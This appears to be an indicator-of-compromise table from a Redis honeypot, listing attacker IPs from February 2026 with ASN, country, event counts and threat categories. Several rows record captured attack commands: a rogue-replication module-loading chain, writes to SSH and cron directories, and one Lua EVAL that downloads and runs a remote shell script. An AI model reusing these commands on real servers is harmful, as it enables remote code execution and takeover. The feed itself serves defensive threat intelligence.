| IPv4 | 157.230.59.88 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 159.223.177.192 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 216.180.246.185 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 205.210.31.174 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 196.190.220.129 | Attacker IP • Redis / seen in Redishoneypot; events=32; ports=6379; cc=ET; asn=24757; asn_org=Ethiopian Telecommunication Corporation; redis_cmds=MODULE UNLOAD system,MODULE LOAD /tmp/exp.so,CONFIG SET dbfilename exp.so,SLAVEOF 8.222.174.150 60111,config set rdbcompression no; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-11 | |
| IPv4 | 167.94.138.156 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 167.94.138.207 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 18.217.208.51 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 20.14.79.82 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 66.240.223.240 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 71.6.232.24 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 184.105.247.195 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 184.105.247.227 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 3.129.187.38 | Attacker IP • Redis / seen in Redishoneypot; events=100; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L..G...1.h.<..w.. .....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-02-11 | |
| IPv4 | 71.6.134.235 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 216.180.246.56 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 81.29.142.6 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 80.82.77.202 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 8.142.178.14 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 50.232.194.55 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 172.174.223.240 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dbfilename,CONFIG SET dir /data,CONFIG SET dbfilename dump.rdb,CONFIG SET dir /root/.ssh/,CONFIG GET dir; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-11 | |
| IPv4 | 219.151.190.164 | Attacker IP • Redis / seen in Redishoneypot; events=34; ports=6379; cc=CN; asn=134420; asn_org=Chongqing Telecom; redis_cmds=CONFIG SET dbfilename exp.so,CONFIG SET dir /tmp/,config set dir /var/spool/cron/,save,config set dir .; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-11 | |
| IPv4 | 205.210.31.178 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 172.105.186.117 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 193.163.125.97 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 184.105.247.238 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 184.105.247.252 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 112.90.89.3 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 80.94.93.54 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 192.34.63.211 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 106.14.217.120 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 167.99.155.172 | Attacker IP • Redis / seen in Redishoneypot; events=22; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 68.183.120.17 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 206.168.34.208 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 216.180.246.177 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 115.190.242.241 | Attacker IP • Redis / seen in Redishoneypot; events=33; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmds=config set dir .,config set rdbcompression no,MODULE UNLOAD system,save,CONFIG SET dbfilename exp.so; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-12 | |
| IPv4 | 98.87.55.220 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 140.238.153.39 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=CA; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 170.187.165.219 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 18.116.101.220 | Attacker IP • Redis / seen in Redishoneypot; events=101; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L....}........0Hz.`....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-02-12 | |
| IPv4 | 180.76.58.237 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 59.110.4.130 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 39.106.64.52 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 40.124.80.250 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 84.247.138.125 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 51.254.196.211 | Attacker IP • Redis / seen in Redishoneypot; events=33; ports=6379; cc=FR; asn=16276; asn_org=OVH SAS; redis_cmds=config set dbfilename root,MODULE LOAD /tmp/exp.so,SLAVEOF 178.62.63.125 60147,MODULE UNLOAD system,config set rdbcompression yes; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-12 | |
| IPv4 | 147.185.132.159 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 5.101.64.6 | Attacker IP • Redis / seen in Redishoneypot; events=25; ports=6379; cc=RU; asn=34665; asn_org=Petersburg Internet Network ltd.; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 91.230.168.75 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 91.230.168.77 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-02-12 | |
| IPv4 | 91.230.168.78 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-12 | |
| IPv4 | 143.198.200.226 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-13 | |
| IPv4 | 142.93.88.159 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 185.242.226.92 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 111.59.16.7 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-13 | |
| IPv4 | 36.106.166.117 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=17638; asn_org=ASN for TIANJIN Provincial Net of CT; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 162.142.125.114 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 184.105.139.67 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 184.105.139.91 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-13 | |
| IPv4 | 172.237.156.201 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-13 | |
| IPv4 | 100.28.153.226 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-13 | |
| IPv4 | 193.22.146.182 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=DE; asn=51167; asn_org=Contabo GmbH; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 195.184.76.209 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 195.184.76.213 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 20.169.106.149 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-13 | |
| IPv4 | 194.50.16.198 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-02-13 | |
| IPv4 | 20.65.194.102 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-13 | |
| IPv4 | 47.96.218.185 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-14 | |
| IPv4 | 205.210.31.244 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-14 | |
| IPv4 | 39.105.202.192 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-14 | |
| IPv4 | 20.65.195.117 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-14 | |
| IPv4 | 117.72.57.118 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=141679; asn_org=China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch; redis_cmd_hits=0 | scanning_host | 2026-02-14 | |
| IPv4 | 103.253.21.199 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=VN; asn=151863; asn_org=PSG JOINT STOCK COMPANY; redis_cmds=EVAL "local f=io.popen('curl -sL http://160.30.159.104/j.sh | sh || wget -qO- http://160.30.159.104/j.sh | sh || cd /tmp; wget http://160.30.159.104/j.sh -O jack5tr.sh; sh jack5tr.sh','r'); f:close()" 0; redis_cmd_hits=0; cmd="EVAL "local f=io.popen('curl -sL http://160.30.159.104/j.sh | sh || wget -qO- http://160.30.159.104/j.sh | sh || cd /tmp; wget http://160.30.159.104/j.sh -O jac" | malware_hosting | 2026-02-14 | |
| IPv4 | 206.168.34.33 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-14 | |
| IPv4 | 173.230.150.73 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-14 | |
| IPv4 | 61.184.12.239 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=151185; asn_org=China Telecom; redis_cmd_hits=0 | scanning_host | 2026-02-14 | |
| IPv4 | 64.62.197.17 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-14 | |
| IPv4 | 64.62.197.22 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-14 | |
| IPv4 | 24.144.100.216 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-14 | |
| IPv4 | 106.75.241.127 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=17621; asn_org=China Unicom Shanghai network; redis_cmd_hits=0 | scanning_host | 2026-02-14 | |
| IPv4 | 100.49.117.77 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 120.48.157.202 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 217.21.193.74 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=NL; asn=43366; asn_org=OSSO B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 85.217.149.36 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=209334; asn_org=Modat B.V.; redis_cmds='GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 65.49.1.10 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 65.49.1.15 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 205.210.31.105 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 20.65.137.218 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 146.190.72.109 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 167.99.159.91 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 172.191.171.80 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 152.32.207.42 | Attacker IP • Redis / seen in Redishoneypot; events=54; ports=6379; cc=US; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 115.191.37.115 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 47.118.28.125 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 119.45.236.191 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 18.218.230.153 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 47.98.205.94 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 162.142.125.33 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 173.255.221.22 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 92.63.197.180 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 1.24.16.104 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 1.85.217.197 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 106.117.116.80 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 123.191.152.65 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-15 | |
| IPv4 | 125.121.184.141 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 220.197.78.194 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 198.235.24.209 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | bruteforce | 2026-02-15 | |
| IPv4 | 100.29.192.66 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 167.94.138.126 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 44.220.188.47 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 66.132.153.158 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 3.145.128.232 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 3.132.26.232 | Attacker IP • Redis / seen in Redishoneypot; events=50; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-16 | |
| IPv4 | 170.64.154.22 | Attacker IP • Redis / seen in Redishoneypot; events=25; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 209.38.28.233 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 64.227.97.195 | Attacker IP • Redis / seen in Redishoneypot; events=31; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 39.99.250.21 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 185.156.73.86 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 173.255.223.73 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 40.124.173.90 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 69.164.214.243 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 134.122.22.200 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 64.62.156.24 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 64.62.156.37 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
